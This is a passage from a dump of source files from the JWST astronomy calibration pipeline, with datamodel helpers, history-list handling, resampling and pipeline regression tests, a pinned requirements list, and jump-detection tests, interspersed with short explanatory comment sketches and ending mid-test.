None\n\n else:\n from . import reference\n if len(shape) == 0:\n new_class = reference.ReferenceFileModel\n elif len(shape) == 2:\n new_class = reference.ReferenceImageModel\n elif len(shape) == 3:\n new_class = reference.ReferenceCubeModel\n elif len(shape) == 4:\n new_class = reference.ReferenceQuadModel\n else:\n new_class = None\n\n return new_class\n\n\ndef _class_from_shape(hdulist, shape):\n \"\"\"\n Get the class name from the shape\n \"\"\"\n if len(shape) == 0:\n from . import model_base\n new_class = model_base.DataModel\n elif len(shape) == 4:\n from . import quad\n new_class = quad.QuadModel\n elif len(shape) == 3:\n from . 
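# --- Editor's note: hedged sketch. ---
# open() above chains four class-inference heuristics and keeps the first
# hit: the DATAMODL header, then the ramp special case, then REFTYPE, then
# the array shape. The control flow reduces to a first-non-None fold:
def first_match(candidates):
    for candidate in candidates:
        result = candidate()
        if result is not None:
            return result
    return None

order = [lambda: None,           # e.g. no DATAMODL keyword present
         lambda: None,           # not a 4-D ramp
         lambda: 'ImageModel']   # the shape heuristic finally decides
assert first_match(order) == 'ImageModel'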
import cube\n new_class = cube.CubeModel\n elif len(shape) == 2:\n try:\n hdulist[('SCI', 2)]\n except (KeyError, NameError):\n # It's an ImageModel\n from . import image\n new_class = image.ImageModel\n else:\n # It's a MultiSlitModel\n from . import multislit\n new_class = multislit.MultiSlitModel\n else:\n new_class = None\n\n return new_class\n\n\ndef can_broadcast(a, b):\n \"\"\"\n Given two shapes, returns True if they are broadcastable.\n \"\"\"\n for i in range(1, min(len(a), len(b)) + 1):\n adim = a[-i]\n bdim = b[-i]\n\n if not (adim == 1 or bdim == 1 or adim == bdim):\n return False\n\n return True\n\n\ndef to_camelcase(token):\n return ''.join(x.capitalize() for x in token.split('_-'))\n\n\ndef is_association(asn_data):\n \"\"\"\n Test if an object is an association by checking for required fields\n \"\"\"\n if isinstance(asn_data, dict):\n if 'asn_id' in asn_data and 'asn_pool' in asn_data:\n return True\n return False\n\n\ndef gentle_asarray(a, dtype):\n \"\"\"\n Performs an asarray that doesn't cause a copy if the byteorder is\n different. It also ignores column name differences -- the\n resulting array will have the column names from the given dtype.\n \"\"\"\n out_dtype = np.dtype(dtype)\n if isinstance(a, np.ndarray):\n in_dtype = a.dtype\n # Non-table array\n if in_dtype.fields is None and out_dtype.fields is None:\n if np.can_cast(in_dtype, out_dtype, 'equiv'):\n return a\n else:\n return np.asanyarray(a, dtype=out_dtype)\n elif in_dtype.fields is not None and out_dtype.fields is not None:\n # When a FITS file includes a pseudo-unsigned-int column, astropy will return\n # a FITS_rec with an incorrect table dtype. The following code rebuilds\n # in_dtype from the individual fields, which are correctly labeled with an\n # unsigned int dtype.\n # We can remove this once the issue is resolved in astropy:\n # https://github.com/astropy/astropy/issues/8862\n if isinstance(a, fits.fitsrec.FITS_rec):\n new_in_dtype = []\n updated = False\n for field_name in in_dtype.fields:\n table_dtype = in_dtype[field_name]\n field_dtype = a.field(field_name).dtype\n if np.issubdtype(table_dtype, np.signedinteger) and np.issubdtype(field_dtype, np.unsignedinteger):\n new_in_dtype.append((field_name, field_dtype))\n updated = True\n else:\n new_in_dtype.append((field_name, table_dtype))\n if updated:\n in_dtype = np.dtype(new_in_dtype)\n\n if in_dtype == out_dtype:\n return a\n in_names = {n.lower() for n in in_dtype.names}\n out_names = {n.lower() for n in out_dtype.names}\n if in_names == out_names:\n # Change the dtype name to match the fits record names\n # as the mismatch causes case insensitive access to fail\n out_dtype.names = in_dtype.names\n else:\n raise ValueError(\n \"Column names don't match schema. \"\n \"Schema has {0}. 
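# --- Editor's note: hedged demo for can_broadcast above. ---
# The loop walks both shapes from the right and accepts each dimension
# pair when they are equal or one of them is 1, which is exactly NumPy's
# broadcasting rule; cross-checked here against NumPy itself:
import numpy as np

assert np.broadcast(np.empty((5, 1, 4)), np.empty((3, 4))).shape == (5, 3, 4)
try:
    np.broadcast(np.empty((5, 2, 4)), np.empty((3, 4)))
    raise AssertionError('expected a broadcast failure')
except ValueError:
    pass                    # 2 vs 3: neither equal nor 1, so rejected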
Data has {1}\".format(\n str(out_names.difference(in_names)),\n str(in_names.difference(out_names))))\n\n new_dtype = []\n for i in range(len(out_dtype.fields)):\n in_type = in_dtype[i]\n out_type = out_dtype[i]\n if in_type.subdtype is None:\n type_str = in_type.str\n else:\n type_str = in_type.subdtype[0].str\n if np.can_cast(in_type, out_type, 'equiv'):\n new_dtype.append(\n (out_dtype.names[i],\n type_str,\n in_type.shape))\n else:\n return np.asanyarray(a, dtype=out_dtype)\n return a.view(dtype=np.dtype(new_dtype))\n else:\n return np.asanyarray(a, dtype=out_dtype)\n else:\n try:\n a = np.asarray(a, dtype=out_dtype)\n except Exception:\n raise ValueError(\"Can't convert {0!s} to ndarray\".format(type(a)))\n return a\n\ndef get_short_doc(schema):\n title = schema.get('title', None)\n description = schema.get('description', None)\n if description is None:\n description = title or ''\n else:\n if title is not None:\n description = title + '\\n\\n' + description\n return description.partition('\\n')[0]\n\n\ndef ensure_ascii(s):\n if isinstance(s, bytes):\n s = s.decode('ascii')\n return s\n\n\ndef create_history_entry(description, software=None):\n \"\"\"\n Create a HistoryEntry object.\n\n Parameters\n ----------\n description : str\n Description of the change.\n software : dict or list of dict\n A description of the software used. It should not include\n asdf itself, as that is automatically notated in the\n `asdf_library` entry.\n\n Each dict must have the following keys:\n\n ``name``: The name of the software\n ``author``: The author or institution that produced the software\n ``homepage``: A URI to the homepage of the software\n ``version``: The version of the software\n\n Examples\n --------\n >>> soft = {'name': 'jwreftools', 'author': 'STSCI', \\\n 'homepage': 'https://github.com/spacetelescope/jwreftools', 'version': \"0.7\"}\n >>> entry = create_history_entry(description=\"HISTORY of this file\", software=soft)\n\n \"\"\"\n from asdf.tags.core import Software, HistoryEntry\n import datetime\n\n if isinstance(software, list):\n software = [Software(x) for x in software]\n elif software is not None:\n software = Software(software)\n\n entry = HistoryEntry({\n 'description': description,\n 'time': datetime.datetime.utcnow()\n })\n\n if software is not None:\n entry['software'] = software\n return entry\n\n\ndef get_envar_as_boolean(name, default=False):\n \"\"\"Interpret an environmental as a boolean flag\n\n Truth is any numeric value that is not 0 or\n any of the following case-insensitive strings:\n\n ('true', 't', 'yes', 'y')\n\n Parameters\n ----------\n name : str\n The name of the environmental variable to retrieve\n\n default : bool\n If the environmental variable cannot be accessed, use as the default.\n \"\"\"\n truths = ('true', 't', 'yes', 'y')\n falses = ('false', 'f', 'no', 'n')\n if name in os.environ:\n value = os.environ[name]\n try:\n value = bool(int(value))\n except ValueError:\n value_lowcase = value.lower()\n if value_lowcase not in truths + falses:\n raise ValueError(f'Cannot convert value \"{value}\" to boolean unambiguously.')\n return value_lowcase in truths\n return value\n\n log.debug(f'Environmental \"{name}\" cannot be found. 
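# --- Editor's note: hedged demo for gentle_asarray above. ---
# For record arrays the function matches column names case-insensitively;
# when the lower-cased name sets agree it renames the schema dtype to the
# data's own column names and returns a view rather than a copy, and a
# genuine name-set mismatch raises ValueError instead:
import numpy as np

rec = np.array([(1, 2.0)], dtype=[('TIME', '<i4'), ('FLUX', '<f8')])
schema_dtype = np.dtype([('time', '<i4'), ('flux', '<f8')])
in_names = {n.lower() for n in rec.dtype.names}
out_names = {n.lower() for n in schema_dtype.names}
assert in_names == out_names   # so gentle_asarray would view, not copy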
Using default value of \"{default}\".')\n return default\n" }, { "alpha_fraction": 0.6012104749679565, "alphanum_fraction": 0.6650975346565247, "avg_line_length": 24.20339012145996, "blob_id": "39d04d2c8f07b45c82fe94736db485ac4a05ae59", "content_id": "0b02c608d5d2d4f84f2f9d4ef61acdaaba909931", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1487, "license_type": "permissive", "max_line_length": 61, "num_lines": 59, "path": "/jwst/tests/test_velocity_aberration.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nTest script for set_velocity_aberration.py\n\"\"\"\nfrom numpy import isclose\nimport os\nimport sys\n\nsys.path.insert(\n 0,\n os.path.join(os.path.dirname(__file__), '../../scripts')\n)\n\nimport set_velocity_aberration as sva # noqa: E402\n\n# Testing constants\nGOOD_VELOCITY = (100.0, 100.0, 100.0)\nGOOD_POS = (0., 0.)\nGOOD_SCALE_FACTOR = 1.000333731048419\nGOOD_OFFSET_X = 0.00033356409519815205\nGOOD_OFFSET_Y = 0.00033356409519815205\n\nZERO_VELOCITY = 0.\nZERO_SCALE_FACTOR = 1.0\nZERO_OFFSET_X = 0.\nZERO_OFFSET_Y = 0.\n\n\ndef test_scale_factor_valid():\n scale_factor = sva.aberration_scale(\n GOOD_VELOCITY[0], GOOD_VELOCITY[1], GOOD_VELOCITY[2],\n GOOD_POS[0], GOOD_POS[1]\n )\n assert isclose(scale_factor, GOOD_SCALE_FACTOR)\n\n\ndef test_scale_factor_zero_velocity():\n scale_factor = sva.aberration_scale(\n ZERO_VELOCITY, ZERO_VELOCITY, ZERO_VELOCITY,\n GOOD_POS[0], GOOD_POS[1]\n )\n assert isclose(scale_factor, ZERO_SCALE_FACTOR)\n\n\ndef test_offset_valid():\n delta_x, delta_y = sva.aberration_offset(\n GOOD_VELOCITY[0], GOOD_VELOCITY[1], GOOD_VELOCITY[2],\n GOOD_POS[0], GOOD_POS[1]\n )\n assert isclose(delta_x, GOOD_OFFSET_X)\n assert isclose(delta_y, GOOD_OFFSET_Y)\n\n\ndef test_offset_zero_velocity():\n delta_x, delta_y = sva.aberration_offset(\n ZERO_VELOCITY, ZERO_VELOCITY, ZERO_VELOCITY,\n GOOD_POS[0], GOOD_POS[1]\n )\n assert isclose(delta_x, ZERO_OFFSET_X)\n assert isclose(delta_y, ZERO_OFFSET_Y)\n" }, { "alpha_fraction": 0.555402934551239, "alphanum_fraction": 0.555402934551239, "avg_line_length": 27.736841201782227, "blob_id": "95ef0694018a6d0c4ac8b1ec26d0485937f0f18b", "content_id": "677b54d09d0ee6cc0ab5a1b9035db1067b6d60b0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2184, "license_type": "permissive", "max_line_length": 67, "num_lines": 76, "path": "/jwst/datamodels/history.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from asdf.tags.core import HistoryEntry\n\ndef _iterable(values):\n if isinstance(values, str) or not hasattr(values, '__iter__'):\n values = (values,)\n return values\n\nclass HistoryList:\n \"\"\"\n A list that coerces a new value into a HistoryEntry.\n Only a subset of the list interface is implemented.\n \"\"\"\n def __init__(self, asdf):\n self._context = asdf\n if len(self._context.get_history_entries()):\n self._entries = self._context.get_history_entries()\n else:\n self._context.add_history_entry(\"fake entry\")\n self._entries = self._context.get_history_entries()\n self._entries.clear()\n\n def __len__(self):\n return len(self._entries)\n\n def __getitem__(self, key):\n return self._entries[key]\n\n def __setitem__(self, key, value):\n self.append(value)\n value = self._entries.pop()\n self._entries[key] = value\n\n def __delitem__(self, key):\n del self._entries[key]\n\n def __iter__(self):\n return iter(self._entries)\n\n def 
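# --- Editor's note: hedged check, derived from the constants above. ---
# GOOD_OFFSET_X/Y equal v/c for the 100 km/s test velocity, consistent
# with a first-order aberration offset, and numpy.isclose compares with
# a relative tolerance (default rtol=1e-05) plus an absolute floor
# (default atol=1e-08):
from numpy import isclose

SPEED_OF_LIGHT_KM_S = 299792.458
assert isclose(100.0 / SPEED_OF_LIGHT_KM_S, 0.00033356409519815205)
assert not isclose(1.000333731048419 + 1e-3, 1.000333731048419)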
__repr__(self):\n return repr(self._entries)\n\n def __str__(self):\n return str(self._entries)\n\n def __eq__(self, other):\n if isinstance(other, HistoryList):\n other = other._entries\n else:\n other = _iterable(other)\n\n if len(self) != len(other):\n return False\n\n for self_entry, other_entry in zip(self._entries, other):\n if isinstance(other_entry, str):\n if self_entry.get('description') != other_entry:\n return False\n elif isinstance(other_entry, dict):\n for key in other_entry.keys():\n if self_entry.get(key) != other_entry.get(key):\n return False\n return True\n\n def append(self, value):\n if isinstance(value, HistoryEntry):\n self._entries.append(value)\n else:\n self._context.add_history_entry(value)\n\n def clear(self):\n self._entries.clear()\n\n def extend(self, values):\n values = _iterable(values)\n for value in values:\n self.append(value)\n" }, { "alpha_fraction": 0.5118279457092285, "alphanum_fraction": 0.6827957034111023, "avg_line_length": 17.235294342041016, "blob_id": "c8de1f4b35000073ca9e5afe305cc8df57457aad", "content_id": "9e7c79b44ae886dc38c44148ef69893f59310f30", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 930, "license_type": "permissive", "max_line_length": 59, "num_lines": 51, "path": "/requirements-sdp.txt", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "# To generate this file:\n#\n# pip install -e .[test]\n# pip install pytest-xdist\n# pip freeze | grep -v jwst.git >> requirements-sdp.txt\nasdf==2.7.0\nastropy==4.0.1.post1\nattrs==19.3.0\ncertifi==2020.6.20\nchardet==3.0.4\nci-watson==0.5\ncodecov==2.1.8\ncoverage==5.2.1\ncrds==7.5.0.0\nCython==0.29.21\ndrizzle==1.13.1\nfilelock==3.0.12\ngwcs==0.13.0\nidna==2.10\nimportlib-metadata==1.7.0\njsonschema==3.2.0\nlxml==4.5.2\nmore-itertools==8.4.0\nnumpy==1.19.1\npackaging==20.4\nParsley==1.3\nphotutils==0.7.2\npluggy==0.13.1\npsutil==5.7.2\npy==1.9.0\npyparsing==2.4.7\npyrsistent==0.16.0\npytest==5.4.3\npytest-cov==2.10.0\npytest-doctestplus==0.8.0\npytest-openfiles==0.5.0\npytest-xdist==1.34.0\nPyYAML==5.3.1\nrequests==2.24.0\nrequests-mock==1.8.0\nscipy==1.5.2\nsemantic-version==2.8.5\nsix==1.15.0\nspherical-geometry==1.2.18\nstsci.image==2.3.3\nstsci.imagestats==1.6.2\nstsci.stimage==0.2.4\ntweakwcs==0.6.4\nurllib3==1.25.10\nwcwidth==0.2.5\nzipp==3.1.0\n" }, { "alpha_fraction": 0.603487491607666, "alphanum_fraction": 0.6133434176445007, "avg_line_length": 28.311111450195312, "blob_id": "d5e461487bc675c6c01229aa4affd8a84ebc7133", "content_id": "c9545c0fd7edac1e571c451eee88945d90470e01", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1319, "license_type": "permissive", "max_line_length": 73, "num_lines": 45, "path": "/jwst/datamodels/level1b.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from .model_base import DataModel\n\n__all__ = ['Level1bModel']\n\n\nclass Level1bModel(DataModel):\n \"\"\"\n A data model for raw 4D ramps level-1b products.\n\n Parameters\n __________\n data : numpy uint16 array\n The science data\n\n zeroframe : numpy uint16 array\n Zeroframe array\n\n refout : numpy uint16 array\n Reference Output\n\n group : numpy table\n group parameters table\n\n int_times : numpy table\n table of times for each integration\n\n \"\"\"\n schema_url = \"http://stsci.edu/schemas/jwst_datamodel/level1b.schema\"\n\n def __init__(self, init=None, **kwargs):\n super(Level1bModel, self).__init__(init=init, 
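# --- Editor's note: hedged sketch. ---
# HistoryList.__setitem__ above funnels assignment through append() so a
# plain string is coerced into a HistoryEntry by the asdf context, then
# pops the coerced tail entry back into place. The same
# coerce-through-append trick, independent of asdf:
class CoercingList(list):
    def _coerce(self, value):
        return {'description': value} if isinstance(value, str) else value

    def append(self, value):
        super().append(self._coerce(value))

    def __setitem__(self, key, value):
        self.append(value)                     # single coercion code path
        super().__setitem__(key, self.pop())

hl = CoercingList()
hl.append('first entry')
hl[0] = 'replaced entry'
assert hl == [{'description': 'replaced entry'}]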
**kwargs)\n\n # zeroframe is a lower dimensional array than\n # the science data. However, its dimensions are not\n # consecutive with data, so the default model\n # creates a wrongly shaped array. If data is given\n # use the appropriate dimensions.\n #\n # TODO: Hacky. Need solution which involves schema\n # specification and embedded in DataModel.\n #if 'zeroframe' not in self.instance and \\\n # 'data' in self.instance and \\\n # len(self.data.shape) == 4:\n # nints, ngroups, ny, nx = self.data.shape\n # self.zeroframe = np.zeros((nints, ny, nx))\n" }, { "alpha_fraction": 0.47067272663116455, "alphanum_fraction": 0.5575771927833557, "avg_line_length": 27.033557891845703, "blob_id": "3fef1871a222b95993f5f0d27fe25401153ca3d4", "content_id": "be2da9866dd48b0d3092802b7817e2406d2f4666", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4177, "license_type": "permissive", "max_line_length": 96, "num_lines": 149, "path": "/jwst/resample/tests/test_resample_spec.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom numpy.testing import assert_allclose\n\nfrom ...datamodels import ImageModel\nfrom jwst.assign_wcs import AssignWcsStep\nfrom jwst.extract_2d import Extract2dStep\nfrom jwst.resample import ResampleSpecStep\n\nfrom gwcs.wcstools import grid_from_bounding_box\n\n\ndef test_spatial_transform_nirspec():\n wcsinfo = {\n 'dec_ref': -0.00601415671349804,\n 'ra_ref': -0.02073605215697509,\n 'roll_ref': -0.0,\n 'v2_ref': -453.5134,\n 'v3_ref': -373.4826,\n 'v3yangle': 0.0,\n 'vparity': -1}\n\n instrument = {\n 'detector': 'NRS1',\n 'filter': 'CLEAR',\n 'grating': 'PRISM',\n 'name': 'NIRSPEC',\n 'gwa_tilt': 37.0610,\n 'gwa_xtilt': 0.0001,\n 'gwa_ytilt': 0.0001}\n\n subarray = {\n 'fastaxis': 1,\n 'name': 'SUBS200A1',\n 'slowaxis': 2,\n 'xsize': 72,\n 'xstart': 1,\n 'ysize': 416,\n 'ystart': 529}\n\n observation = {\n 'date': '2016-09-05',\n 'time': '8:59:37'}\n\n exposure = {\n 'duration': 11.805952,\n 'end_time': 58119.85416,\n 'exposure_time': 11.776,\n 'frame_time': 0.11776,\n 'group_time': 0.11776,\n 'groupgap': 0,\n 'integration_time': 11.776,\n 'nframes': 1,\n 'ngroups': 100,\n 'nints': 1,\n 'nresets_between_ints': 0,\n 'nsamples': 1,\n 'readpatt': 'NRSRAPID',\n 'sample_time': 10.0,\n 'start_time': 58119.8333,\n 'type': 'NRS_FIXEDSLIT',\n 'zero_frame': False}\n\n im = ImageModel()\n im.data = np.random.rand(2048, 2048)\n im.error = np.random.rand(2048, 2048)\n im.dq = np.random.rand(2048, 2048)\n\n im.meta.wcsinfo._instance.update(wcsinfo)\n im.meta.instrument._instance.update(instrument)\n im.meta.observation._instance.update(observation)\n im.meta.exposure._instance.update(exposure)\n im.meta.subarray._instance.update(subarray)\n im.meta.filename = 'test.fits'\n im = AssignWcsStep.call(im)\n im = Extract2dStep.call(im)\n im = ResampleSpecStep.call(im)\n\n for slit in im.slits:\n x, y =grid_from_bounding_box(slit.meta.wcs.bounding_box)\n ra, dec, lam = slit.meta.wcs(x, y)\n\n ra1 = np.where(ra < 0, 360 + ra, ra)\n assert_allclose(slit.meta.wcs.invert(ra, dec, lam), slit.meta.wcs.invert(ra1, dec, lam))\n\n\ndef test_spatial_transform_miri():\n wcsinfo = {\n 'dec_ref': -0.00601415671349804,\n 'ra_ref': -0.02073605215697509,\n 'roll_ref': -0.0,\n 'v2_ref': -453.5134,\n 'v3_ref': -373.4826,\n 'v3yangle': 0.0,\n 'vparity': -1}\n\n instrument = {\n 'detector': 'MIRIMAGE',\n 'filter': 'P750L',\n 'name': 'MIRI'}\n\n observation = {\n 'date': '2019-01-01',\n 'time': '17:00:00'}\n\n 
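# --- Editor's note: hedged usage sketch for Level1bModel above. ---
# A level-1b product holds a 4-D uint16 ramp indexed as (integrations,
# groups, rows, columns); zeroframe, per the commented-out note above,
# would drop the group axis to (integrations, rows, columns).
import numpy as np
from jwst.datamodels import Level1bModel

m = Level1bModel()
m.data = np.zeros((1, 5, 32, 32), dtype=np.uint16)
assert m.data.shape == (1, 5, 32, 32)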
subarray = {\n 'fastaxis': 1,\n 'name': 'SLITLESSPRISM',\n 'slowaxis': 2,\n 'xsize': 72,\n 'xstart': 1,\n 'ysize': 416,\n 'ystart': 529}\n\n exposure = {\n 'duration': 11.805952,\n 'end_time': 58119.85416,\n 'exposure_time': 11.776,\n 'frame_time': 0.11776,\n 'group_time': 0.11776,\n 'groupgap': 0,\n 'integration_time': 11.776,\n 'nframes': 1,\n 'ngroups': 100,\n 'nints': 1,\n 'nresets_between_ints': 0,\n 'nsamples': 1,\n 'readpatt': 'FAST',\n 'sample_time': 10.0,\n 'start_time': 58119.8333,\n 'type': 'MIR_LRS-SLITLESS',\n 'zero_frame': False}\n\n im = ImageModel()\n im.data = np.random.rand(416, 72)\n im.error = np.random.rand(416, 72)\n im.dq = np.random.rand(416, 72)\n\n im.meta.wcsinfo._instance.update(wcsinfo)\n im.meta.instrument._instance.update(instrument)\n im.meta.observation._instance.update(observation)\n im.meta.exposure._instance.update(exposure)\n im.meta.subarray._instance.update(subarray)\n\n out = AssignWcsStep.call(im)\n out = ResampleSpecStep.call(out)\n x, y =grid_from_bounding_box(out.meta.wcs.bounding_box)\n ra, dec, lam = out.meta.wcs(x, y)\n ra1 = np.where(ra < 0, 360 + ra, ra)\n assert_allclose(out.meta.wcs.invert(ra, dec, lam), out.meta.wcs.invert(ra1, dec, lam))\n" }, { "alpha_fraction": 0.6638655662536621, "alphanum_fraction": 0.7605041861534119, "avg_line_length": 36.578948974609375, "blob_id": "34f51c4e36932d7a4c388ebe3d6404d8273a99cd", "content_id": "2c54786d17f344dc3354be7f6ec4df937b49dfa2", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "permissive", "max_line_length": 89, "num_lines": 19, "path": "/jwst/regtest/test_nirspec_image2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom astropy.io.fits.diff import FITSDiff\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\[email protected]\ndef test_nirspec_image2(_jail, rtdata, fitsdiff_default_kwargs):\n rtdata.get_data(\"nirspec/imaging/jw84600010001_02102_00001_nrs2_rate.fits\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/calwebb_image2.cfg\", rtdata.input]\n Step.from_cmdline(args)\n rtdata.output = \"jw84600010001_02102_00001_nrs2_cal.fits\"\n\n rtdata.get_truth(\"truth/test_nirspec_image2/jw84600010001_02102_00001_nrs2_cal.fits\")\n\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n" }, { "alpha_fraction": 0.5576266050338745, "alphanum_fraction": 0.5784404873847961, "avg_line_length": 29.951923370361328, "blob_id": "26d83b8f5ed5c455fd73595cdbc8637722bb3774", "content_id": "6ccbbdaa85f9395019d3e824cbe8a3b824f9ec72", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3219, "license_type": "permissive", "max_line_length": 105, "num_lines": 104, "path": "/jwst/tests_nightly/general/nirspec/test_calwebb_spec2_nrs_msa.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test calwebb_spec2 for NIRSpec MSA\"\"\"\nimport os.path as op\n\nimport pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\nfrom jwst.associations import load_asn\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe.step import Step\n\n\[email protected]\nclass TestSpec2NRSMSA(BaseJWSTTest):\n \"\"\"Test various aspects of calibrating NIRSpec MSA mode\"\"\"\n input_loc = 'nirspec'\n ref_loc = ['test_datasets', 'msa', 'simulated-3nod', 'truth']\n 
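# --- Editor's note: hedged demo. ---
# Both resample tests above fold negative right ascensions into [0, 360)
# before asserting that wcs.invert gives identical answers for either
# representation: -0.02 deg and 359.98 deg name the same sky longitude.
import numpy as np

ra = np.array([-0.02, 10.0, 359.5])
ra1 = np.where(ra < 0, 360 + ra, ra)
assert np.allclose(ra1, [359.98, 10.0, 359.5])
assert np.allclose(np.mod(ra, 360), ra1)   # an equivalent normalization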
test_dir = ['test_datasets', 'msa', 'simulated-3nod']\n\n def test_msa_missing(self, caplog):\n \"\"\"Test MSA missing failure\"\"\"\n input_file = self.get_data(\n *self.test_dir, 'level2a_twoslit', 'F170LP-G235M_MOS_observation-6-c0e0_001_DN_NRS1_mod.fits'\n )\n\n collect_pipeline_cfgs('cfgs')\n args = [\n op.join('cfgs', 'calwebb_spec2.cfg'),\n input_file\n ]\n\n with pytest.raises(Exception):\n Step.from_cmdline(args)\n\n assert 'Missing MSA meta (MSAMETFL) file' in caplog.text\n\n def test_msa_missing_nofail(self, caplog):\n \"\"\"Test MSA missing failure\"\"\"\n input_file = self.get_data(\n *self.test_dir, 'level2a_twoslit', 'F170LP-G235M_MOS_observation-6-c0e0_001_DN_NRS1_mod.fits'\n )\n\n collect_pipeline_cfgs('cfgs')\n args = [\n op.join('cfgs', 'calwebb_spec2.cfg'),\n input_file,\n '--fail_on_exception=false'\n ]\n\n Step.from_cmdline(args)\n\n assert 'Missing MSA meta (MSAMETFL) file' in caplog.text\n\n def test_msa_missing_skip(self, caplog):\n \"\"\"Test MSA missing failure\"\"\"\n input_file = self.get_data(\n *self.test_dir, 'level2a_twoslit', 'F170LP-G235M_MOS_observation-6-c0e0_001_DN_NRS1_mod.fits'\n )\n\n collect_pipeline_cfgs('cfgs')\n args = [\n op.join('cfgs', 'calwebb_spec2.cfg'),\n input_file,\n '--steps.assign_wcs.skip=true'\n ]\n\n Step.from_cmdline(args)\n\n assert 'Aborting remaining processing for this exposure.' in caplog.text\n\n def test_run_msaflagging(self, caplog):\n \"\"\"Test msa flagging operation\"\"\"\n\n # Retrieve the data.\n collect_pipeline_cfgs('cfgs')\n self.get_data(\n *self.test_dir, 'jw95065006001_0_msa_twoslit.fits'\n )\n asn_path = self.get_data(\n *self.test_dir, 'mos_udf_g235m_twoslit_spec2_asn.json'\n )\n with open(asn_path) as fp:\n asn = load_asn(fp)\n for product in asn['products']:\n for member in product['members']:\n self.get_data(\n *self.test_dir, 'level2a_twoslit', member['expname']\n )\n\n # Run step.\n args = [\n op.join('cfgs', 'calwebb_spec2.cfg'),\n asn_path,\n '--steps.msa_flagging.skip=false'\n ]\n Step.from_cmdline(args)\n\n # Test.\n assert 'Step msa_flagging running with args' in caplog.text\n assert 'Step msa_flagging done' in caplog.text\n\n for product in asn['products']:\n prod_name = product['name'] + '_cal.fits'\n assert op.isfile(prod_name)\n" }, { "alpha_fraction": 0.47309738397598267, "alphanum_fraction": 0.5792407989501953, "avg_line_length": 40.5625, "blob_id": "51de8ddbd71459ef66a0bec0add63ce38f25ba4c", "content_id": "f72e0ef5999e8be2b6abbfb954209673daa223a3", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27265, "license_type": "permissive", "max_line_length": 114, "num_lines": 656, "path": "/jwst/jump/tests/test_detect_jumps.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pytest\n\nfrom jwst.datamodels import GainModel, ReadnoiseModel\nfrom jwst.datamodels import RampModel\nfrom jwst.jump.jump import detect_jumps\nimport multiprocessing\nfrom jwst.datamodels import dqflags\n\ndef test_nocrs_noflux(setup_inputs):\n \"\"\"\"\n All pixel values are zero. So slope should be zero\n \"\"\"\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=5)\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert (0 == np.max(out_model.groupdq))\n\ndef test_nocrs_noflux_badgain_pixel(setup_inputs):\n \"\"\"\"\n all pixel values are zero. 
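# --- Editor's note: hedged sketch; file names below are placeholders. ---
# Each test above drives a full pipeline through Step.from_cmdline with
# exactly the argument strings a shell `strun` invocation would use: a
# .cfg file, the input exposure, then dotted per-step parameter overrides.
from jwst.stpipe import Step

args = [
    'cfgs/calwebb_spec2.cfg',            # pipeline configuration
    'example_nrs1_rate.fits',            # hypothetical input product
    '--steps.msa_flagging.skip=false',   # override one step parameter
]
# Step.from_cmdline(args)   # would parse the args and run the pipeline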
So slope should be zero, pixel with bad gain should\n have pixel dq set to 'NO_GAIN_VALUE' and 'DO_NOT_USE'\n \"\"\"\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=5)\n gain.data[7, 7] = -10 #bad gain\n gain.data[17, 17] = np.nan # bad gain\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert(np.bitwise_and(out_model.pixeldq[7, 7], dqflags.pixel['NO_GAIN_VALUE']))\n assert (np.bitwise_and(out_model.pixeldq[7, 7], dqflags.pixel['DO_NOT_USE']))\n assert (np.bitwise_and(out_model.pixeldq[17, 17], dqflags.pixel['NO_GAIN_VALUE']))\n assert (np.bitwise_and(out_model.pixeldq[17, 17], dqflags.pixel['DO_NOT_USE']))\n\n\ndef test_nocrs_noflux_subarray(setup_inputs):\n \"\"\"\"\n All pixel values are zero. This shows that the subarray reference files get extracted from the full frame\n versions.\n \"\"\"\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=5, subarray=True)\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert (0 == np.max(out_model.groupdq))\n\ndef test_onecr_10_groups_neighbors_flagged(setup_inputs):\n \"\"\"\"\n A single CR in a 10 group exposure\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 5, 5] = 15.0\n model1.data[0, 1, 5, 5] = 20.0\n 